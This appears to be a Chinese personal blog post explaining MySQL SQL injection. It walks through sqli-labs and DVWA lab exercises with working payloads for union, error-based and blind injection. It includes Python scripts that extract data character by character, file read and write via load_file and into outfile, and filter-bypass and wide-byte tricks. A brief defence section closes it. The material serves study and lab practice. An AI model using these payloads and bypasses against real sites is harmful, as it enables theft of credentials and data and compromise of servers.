<!DOCTYPE HTML>
<html lang="en">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="mysql安全注入防范, 煮酒">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>mysql安全注入防范 | 煮酒</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 5.4.0"></head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">煮酒</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>Index</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>Tags</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>Categories</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>Archives</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>About</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>Contact</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>Friends</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="Search" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">煮酒</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			Index
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			Tags
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			Categories
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			Archives
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			About
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			Contact
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			Friends
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/17.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">mysql安全注入防范</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                          <div class="article-tag">
                            <span class="chip bg-color">No tag</span>
                          </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>Publish Date:&nbsp;&nbsp;
                    2020-07-08
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h2 id="什么是SQL注入"><a href="#什么是SQL注入" class="headerlink" title="什么是SQL注入"></a>什么是SQL注入</h2><p>  通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串，达到欺骗服务器执行恶意的SQL命令。除了URL提交，攻击者还可以通过抓包的方法在文件头等地方进行SQL注入</p>
<h2 id="注入的危害"><a href="#注入的危害" class="headerlink" title="注入的危害"></a>注入的危害</h2><p>　(1)、数据库信息泄露：数据库中存放的用户的隐私信息的泄露<br>　(2)、网页串改：通过数据库对特定的网页进行篡改（网页内容存储在数据库，通过修改内<br>容达到网页篡改）<br>　(3)、网站挂马，传播恶意软件：通过修改数据库一些字段的值，嵌入网马链接，进行网马<br>攻击<br>　(4)、数据库被恶意操作：数据库被攻击，数据库的系统管理员账户被篡改<br>　(5)、获取webshell：利用数据库存在的权限分配缺陷获取webshell甚至是系统权限</p>
<h2 id="注入产生的因素"><a href="#注入产生的因素" class="headerlink" title="注入产生的因素"></a>注入产生的因素</h2><p> （1)、不严格校验<br> （2)、恶意修改<br> （3)、成功拼接并执行</p>
<h2 id="检测是否存在注入的方法"><a href="#检测是否存在注入的方法" class="headerlink" title="检测是否存在注入的方法"></a>检测是否存在注入的方法</h2><p>   (1)、判断是否有注入（判断是否有未严格校验），什么类型的注入<br>            1、可控参数的改变能否影响页面显示结果<br>            2、输入的sql语句是否能报错–能通过数据库的报错，可以看到一些语句痕迹<br>            3、输入的sql语句能否不报错–语句能够成功闭合<br>   (2)、语句是否能够被恶意修改<br>   (3)、是否能否成功执行<br>   (4)、获取想要的数据</p>
<h2 id="SQL注入常识"><a href="#SQL注入常识" class="headerlink" title="SQL注入常识"></a>SQL注入常识</h2><h3 id="1-布尔查询"><a href="#1-布尔查询" class="headerlink" title="1.布尔查询"></a>1.布尔查询</h3><p>or查询：可查到定义表中的字段值</p>
<h3 id="2-union查询"><a href="#2-union查询" class="headerlink" title="2.union查询"></a>2.union查询</h3><p>（1）猜字段数 （select 1,2,3…. 或者 order by 1,order by 3… 都是看报错）<br>（2）如何获取库名，表名，字段名<br>（3）权限问题</p>
<h3 id="3-information-schema-数据库字典"><a href="#3-information-schema-数据库字典" class="headerlink" title="3.information_schema(数据库字典)"></a>3.information_schema(数据库字典)</h3><p>information_schema这这个数据库中保存了MySQL服务器所有数据库的信息。<br>如数据库名，数据库的表，表栏的数据类型与访问权限等。<br>再简单点，这台MySQL服务器上，到底有哪些数据库、各个数据库有哪些表，<br>每张表的字段类型是什么，各个数据库要什么权限才能访问，等等信息都保存在information_schema里面。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">information_schema.schemata中的列schema_name记录了所有数据库的名字</span><br><span class="line">information_schema.tables中的列table_schema记录了所有数据库的名字</span><br><span class="line">information_schema.tables中的列table_name记录了所有数据库的表的名字</span><br><span class="line">information_schema.columns中的列table_schema记录了所有数据库的名字</span><br><span class="line">information_schema.columns中的列table_name记录了所有数据库的表的名字</span><br><span class="line">information_schema.columns中的列column_name记录了所有数据库的表的列的名字</span><br><span class="line"> </span><br></pre></td></tr></table></figure>
<p> MySQL版本5.0 以下没有 information_schema 这个系统表，无法列表名等，只能暴力跑表名。<br>5.0 以下是多用户单操作，5.0 以上是多用户多操做<br>example: select concat(table_name) from information_schema.tables where table_schema=database()</p>
<h3 id="4-手动注入"><a href="#4-手动注入" class="headerlink" title="4.手动注入"></a>4.手动注入</h3><p>(1)基于错误的注入：判断注入点？单引号？<br>(2)基于布尔的注入：闭合前面的sql语句，构造or和and的逻辑语句，– 用来注释后面所有语句<br>(3)基于union的注入：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">user()：当前用户名</span><br><span class="line">     database()：当前数据库名</span><br><span class="line">     version()：数据库版本信息</span><br><span class="line"><span class="string">&#x27;union select 1,table_schema from information_schema.tables -- hh  #查库名</span></span><br><span class="line"><span class="string">&#x27;</span>union select 1,table_name from information_shcema.tables <span class="built_in">where</span> table_schema=<span class="string">&quot;...&quot;</span> <span class="comment">#查当前库中所有表</span></span><br><span class="line"><span class="string">&#x27;union select 1,column_name from information_schema.columns where table_name=&quot;...&quot;  #查当前表中所有字段</span></span><br><span class="line"><span class="string"> </span></span><br></pre></td></tr></table></figure>

<p>#concat实现字段拼接<br>‘union select user,concat(first_name,’  ‘,last_name,’  ‘,password) from users – ‘<br>#group_concat<br>#concat_ws</p>
<h3 id="5-报错注入"><a href="#5-报错注入" class="headerlink" title="5.报错注入"></a>5.报错注入</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">（1）extractvalue(xml_document,Xpath_string)                        从目标XML中返回包含所查询值的字符串</span><br><span class="line"> （2）Updatexml(xml_document,Xpath_string,new_value)      注入报错点在Xpath_string 位置,因此其它位置可以任意处理,譬如写1.`</span><br><span class="line"> DVWA Security=&#x27;low&#x27;:</span><br><span class="line">  and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1)# 0x7e为~的16进制ASCII码</span><br><span class="line"> </span><br><span class="line">  and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=&#x27;dvwa&#x27;),0x7e),1)#</span><br><span class="line"> </span><br><span class="line"> and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=&#x27;dvwa&#x27; and table_name=&#x27;users&#x27;),0x7e),1)#</span><br><span class="line"> </span><br><span class="line">  and updatexml(1,concat(0x7e,(select group_concat(user_id,last_name) from users),0x7e),1)#</span><br><span class="line"> </span><br></pre></td></tr></table></figure>
<p>其中:<br>XML_document是string格式，为XML文档对象的名称<br>Xpath_string(Xpath格式的字符串)，自主学习。<br>new_value,string格式，替换查找到的符合条件的数据</p>
<h3 id="6-双注入（双查询报错注入，两个select）"><a href="#6-双注入（双查询报错注入，两个select）" class="headerlink" title="6.双注入（双查询报错注入，两个select）"></a>6.双注入（双查询报错注入，两个select）</h3><p>原理: 利用group by主键冲突报错获取数据库信息.<br>几个函数:<br>floor()                     #向下取整<br>       rand()                      #返回（0,1）随机值,rand()*2 返回(0,2)随机值<br>       floor(rand()*2)             # 向下取整则返回值为0或1.<br>       group by                    #分组<br>       count()                    #返回当前的表的所有的记录数<br>举例:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Sqli-labs Less-11(payload)</span><br><span class="line">uname=admin&#x27; union select 1,count(1) from information_schema.tables  group by</span><br><span class="line"> group_concat( floor(rand()*2),(select table_name from information_schema.tables where table_schema=&#x27;security&#x27; )) %23&amp;passwd=123</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h3 id="7-布尔盲注"><a href="#7-布尔盲注" class="headerlink" title="7.布尔盲注"></a>7.布尔盲注</h3><p>普通注入不能直接回显错误信息。<br>和时间盲注相同的是，每次只判断一个字符。<br>?id=1’ and substr(database(),1,1)=1 #<br>示例:<br>Sqli-labs Less-6<br>该关卡只有两种返回结果，当查询存在时返回“You are in…”，否则返回为空。<br>?id=1’ and 1=1 –+回显You are in………..<br>?id=1’ and 1=2 –+不回显<br>根据这种情况，可以由substr()函数每次判断一个字符，python脚本进行布尔盲注,具体如下:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">s = requests.Session()</span><br><span class="line">url = &#x27;http://localhost:8080/sqli-labs/Less-6/&#x27;</span><br><span class="line">payloads = &#x27;AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz[&#123;\|]&#125;^~_,&#x27;</span><br><span class="line">data = &#x27;&#x27;</span><br><span class="line"></span><br><span class="line">for i in range(50):</span><br><span class="line">    for j in payloads:</span><br><span class="line">        payload = f&quot;?id=1\&quot; and substr(binary database(),&#123;i&#125;,1)=&#x27;&#123;j&#125;&#x27;%23&quot;</span><br><span class="line">        #payload = f&quot;?id=1\&quot; and substr((select binary group_concat(table_name) from information_schema.tables where table_schema=database()) ,&#123;i&#125;,1)=&#x27;&#123;j&#125;&#x27;%23&quot;</span><br><span class="line">        #payload = f&quot;?id=1&quot; and substr((select binary group_concat(column_name) from information_schema.columns where table_name=&#x27;users&#x27;) ,&#123;i&#125;,1)=&#x27;&#123;j&#125;&#x27;%23&quot;</span><br><span class="line">        #payload = f&quot;?id=1&quot; and substr((select binary group_concat(password,&#x27; &#x27;) from security.users) ,&#123;i&#125;,1)=&#x27;&#123;j&#125;&#x27;%23&quot;</span><br><span class="line">        if &quot;You are in...........&quot; in s.get(url+payload).text:</span><br><span class="line">            data += j</span><br><span class="line">            break</span><br><span class="line">    print(data)</span><br></pre></td></tr></table></figure>

<h3 id="8-时间盲注"><a href="#8-时间盲注" class="headerlink" title="8.时间盲注"></a>8.时间盲注</h3><p>?id=1’ union select(if(substr(database(),1,1))&gt;1,sleep(3),1)         #此外还有bench()函数<br>示例：<br>Sqli-labs Less-9<br>此处可以发现无论查询对错都只回显You are in………..<br>测试?id=1’ and sleep(3)%23 页面会延时3秒再回显，判断为时间盲注.<br>编写脚本进行时间盲注，如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">url = &#x27;http://localhost:8080/sqli-labs/Less-9/&#x27;</span><br><span class="line">payloads = &#x27;AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz[&#123;\|]&#125;^~_,&#x27;</span><br><span class="line">data = &#x27;&#x27;</span><br><span class="line">for i in range(50):</span><br><span class="line">    for j in payloads:</span><br><span class="line">        payload = f&quot;?id=1&#x27; and if((substr(binary database(),&#123;i&#125;,1)=&#x27;&#123;j&#125;&#x27;),sleep(1),1)%23&quot;</span><br><span class="line">        #正确的时候等待1秒钟，不正确的时候直接返回</span><br><span class="line">        # payload = f&quot;?id=1&#x27; and if((substr((select binary group_concat(table_name) from information_schema.tables where table_schema=database()) ,&#123;i&#125;,1)=&#x27;&#123;j&#125;&#x27;),sleep(1),1)%23&quot;</span><br><span class="line">        #payload = f&quot;?id=1&#x27; and if((substr((select binary group_concat(column_name) from information_schema.columns where table_name=&#x27;users&#x27;) ,&#123;i&#125;,1)=&#x27;&#123;j&#125;&#x27;),sleep(1),1)%23&quot; </span><br><span class="line">        try:</span><br><span class="line">            r = requests.get(url+payload, timeout=1)</span><br><span class="line">        except Exception:</span><br><span class="line">            data += j</span><br><span class="line">            print(data)</span><br><span class="line">            break</span><br><span class="line">            </span><br></pre></td></tr></table></figure>
<h3 id="9-cookie注入"><a href="#9-cookie注入" class="headerlink" title="9.cookie注入"></a>9.cookie注入</h3><p>注入位置在http请求的cookie处</p>
<h3 id="10-HTTP-Referer注入"><a href="#10-HTTP-Referer注入" class="headerlink" title="10.HTTP-Referer注入"></a>10.HTTP-Referer注入</h3><p>注入位置在http请求的Referer处</p>
<h3 id="11-SQL注入读取文件"><a href="#11-SQL注入读取文件" class="headerlink" title="11.SQL注入读取文件"></a>11.SQL注入读取文件</h3><p>Load_file(filename): 读取文件并返回改文件的内容作为一个字符串。<br>使用条件：<br>A.必须有权限读取且文件必须完全可读<br>B.欲读取文件必须在服务器上<br>C.必须指定文件的完整路径(绝对路径)<br>D.欲读取文件的大小必须小于max_allowed_packet<br>示例:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&#x27; union select 1,2,Load_file(&quot;D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-1\\index.php&quot;) --+﻿</span><br></pre></td></tr></table></figure>
<p>写文件（into outfile)：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&#x27; union select 1,2,3 into outfile &quot;D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-1\\index.php&quot; --+</span><br></pre></td></tr></table></figure>
<p>示例:<br>Sqli-labs Less-7<br>测试发现id=1’报错，但把后面的语句注释掉扔报错，还有括号闭合，发现加两个括号判断为((‘$id’))闭合，再根据提示Use outfile…，应该是使用导出语句了。<br>（1）首先判断是否有权限：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&#x27;)) and (select count(*) from mysql.user)&gt;0 --+</span><br></pre></td></tr></table></figure>
<p>没有报错，具有root权限。<br>（2）于是将可以数据导出, 导出所有表：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&#x27;)) union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) into outfile &quot;D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\result.txt&quot; --+</span><br></pre></td></tr></table></figure>
<p>（3）导出user表中所有列名：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&#x27;)) union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name=&#x27;users&#x27;) into outfile &quot;D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\result.txt&quot; --+</span><br></pre></td></tr></table></figure>
<p>（4）导出用户名和密码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&#x27;)) union select 1,2,(select group_concat(username,password) from users) into outfile &quot;D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\result.txt&quot; --+</span><br></pre></td></tr></table></figure>
<p>注意：在Mysql中，需要注意路径转义的问题，即用双斜杠分隔。</p>
<h3 id="11-绕过"><a href="#11-绕过" class="headerlink" title="11.绕过"></a>11.绕过</h3><p>(1).绕过注释符过滤(#,–+)<br>示例：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Sqli-labs Less-13</span><br></pre></td></tr></table></figure>
<p>方法一(报错注入)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?id=1&#x27; or (extractvalue(1,concat(0x7e,version()))) or &#x27;</span><br><span class="line">?id=1&#x27; or (extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))) or &#x27;</span><br></pre></td></tr></table></figure>
<p>方法二(闭合后面的内容)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=&#x27; union select 1,&#x27;</span><br></pre></td></tr></table></figure>

<p>(2).绕过and-or过滤<br>01.大小写绕过:<br>or的几种形式(Or,oR,OR,||)<br>and的几种形式(And,…,&amp;&amp;)     #对大小写敏感可使用<br>02.双写绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&#x27; oorrder by 1 --+</span><br></pre></td></tr></table></figure>
<p>判断回显列数也可用：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&#x27; union select 1,2,3...   #(逐个尝试比较慢)</span><br></pre></td></tr></table></figure>
<p>之后使用报错注入即可：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&#x27; oorr extractvalue(1,concat(0x7e,database())) --+  #(获取当前数据库名)</span><br></pre></td></tr></table></figure>
<p>或者使用：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&#x27; || extractvalue(1,concat(0x7e,database())) --+</span><br></pre></td></tr></table></figure>
<p>(3).绕过空格过滤<br>其他字符代替：<br>%09 TAB 键(水平)<br>%0a 新建一行<br>%0b TAB 键(垂直)<br>%0c 新的一页<br>%0d return 功能<br>%a0 空格<br>/**/ 代替空格<br>?id=1’ or (内容) or (内容)’           #一种注入的形式<br>(4).内联注释过滤<br>形如/<em>!(关键字)</em>/<br>example:<br>/<em>!and</em>/</p>
<p>/<em>!select</em>/<br>(5).特殊字符转义与宽字节注入<br>特殊字符转义的三种方法:<br>(1)自定义转义函数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">function check_addslashes($string)&#123;</span><br><span class="line">    $string = preg_replace(&#x27;/&#x27;. preg_quote(&#x27;\\&#x27;) .&#x27;/&#x27;, &quot;\\\\\\&quot;, $string);</span><br><span class="line">    //escape any backslash</span><br><span class="line">    $string = preg_replace(&#x27;/\&#x27;/i&#x27;, &#x27;\\\&#x27;&#x27;, $string);</span><br><span class="line">    //escape single quote with a backslash</span><br><span class="line">    $string = preg_replace(&#x27;/\&quot;/&#x27;, &quot;\\\&quot;&quot;, $string);</span><br><span class="line">    //escape double quote with a backslash</span><br><span class="line">    return $string;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>(2)调用函数 addslashes()<br>(3)调用函数 mysql_real_escape_string()<br>这几种方法都可能被宽字节注入绕过<br>宽字节注入原理分析:<br>以单引号’为例，它被转义为’，我们的目标是去掉反斜杠，将’逃逸出来。现在我们不输入’，而是输入%df’，被转义后它变成：%df’，也相当于%df%5c%27(%5c表示反斜杠\ )，之后在数据库查询前由于使用了GBK多字节编码，%df%5c会gbk编码转换成为汉字”運”，从而使得%27，也就是单引号逃逸。<br>宽字节注入与普通注入payload上的区别就是：在会被转义的字符前加上%df,’’被吃掉，从而使得被转义字符逃逸。当然此处不一定必须是%df,只要(填充的字符+%5c)在GBK编码中，可以使得被转义字符逃逸就行，之后进行后续注入。<br>示例：Sqli-labs Less-32<br>payload1:?id=1’<br>可以看到此处的单引号被转义<br>payload2:?id=1%df’<br>根本原因:<br>character_set_client(客户端的字符集)和 character_set_connection(连接层的字符集)不同,或转换函数如，iconv、mb_convert_encoding 使用不当。<br>解决方法:<br>统一数据库、Web 应用、操作系统所使用的字符集，避免解析产生差异，最好都设置为 UTF-8。或对数据进行正确的转义，如 mysql_real_escape_string+mysql_set_charset 的使用。<br>(6).二次注入<br>(7).过滤函数绕过</p>
<h2 id="SQL注入防御"><a href="#SQL注入防御" class="headerlink" title="SQL注入防御"></a>SQL注入防御</h2><p>通过前面的讲解我们得知，要想成功利用SQL注入漏洞，需要同时满足两个条件，一是攻击者可以控制用户的输入，二是注入的代码要被成功执行。下面的内容主要围绕这两个方面来展开。<br>　　【从源头进行防御的思想】即需要对从其他地方传递过来的参数在进入数据库之前进行正确的处理。主要有以下几个方面<br>　　1、在表单中通过js绑定数据类型、或者过滤一些非法字符<br>　　2、连接数据库时，使用预编译语句，绑定变量【PHP中使用mysqli、PDO进行连接使用数据库】<br>　　3、在数据进入后台逻辑时，先对传入的参数进行验证，确保符合应用中定义的标准。主要有白名单和黑名单两种方法来实现。从理论上来讲，白名单的安全性要比黑名单高，因为它只允许在白名单中定义的数据通过，其他数据都会被过滤掉。黑名单只会过滤定义在黑名单中的数据（比如SQL注入中的一些危险字符），通常使用正则表达式来实现。但需要注意的是，由于黑名单不可能包含所有的危险字符，所以可能会出现黑名单被绕过的情况。例如在mysql注入中，当在黑名单中过滤了空格字符，我们可以使用”/*（mysql中注释符）”和”+”来代替空格，绕过黑名单的限制继续注入，因此我们应该尽量多使用白名单。</p>
<h3 id="代码层"><a href="#代码层" class="headerlink" title="代码层"></a>代码层</h3><p>01.黑名单<br>02.白名单<br>03.敏感字符过滤<br>04.使用框架安全查询<br>05.规范输出</p>
<h3 id="配置层"><a href="#配置层" class="headerlink" title="配置层"></a>配置层</h3><p>01.开启GPC<br>02.使用UTF-8</p>
<h3 id="物理层"><a href="#物理层" class="headerlink" title="物理层"></a>物理层</h3><p>01.WAF<br>02.数据库审计<br>03.云防护<br>04.IPS(入侵防御系统)<br>01.使用安全的API<br>02.对输入的特殊字符进行Escape转义处理<br>03.使用白名单来规范化输入验证方法<br>04.对客户端输入进行控制，不允许输入SQL注入相关的特殊字符<br>05.服务器端在提交数据库进行SQL查询之前，对特殊字符进行过滤、转义、替换、删除。</p>

                
            </div>
            <hr/>

            



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            <span class="chip bg-color">No tag</span>
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
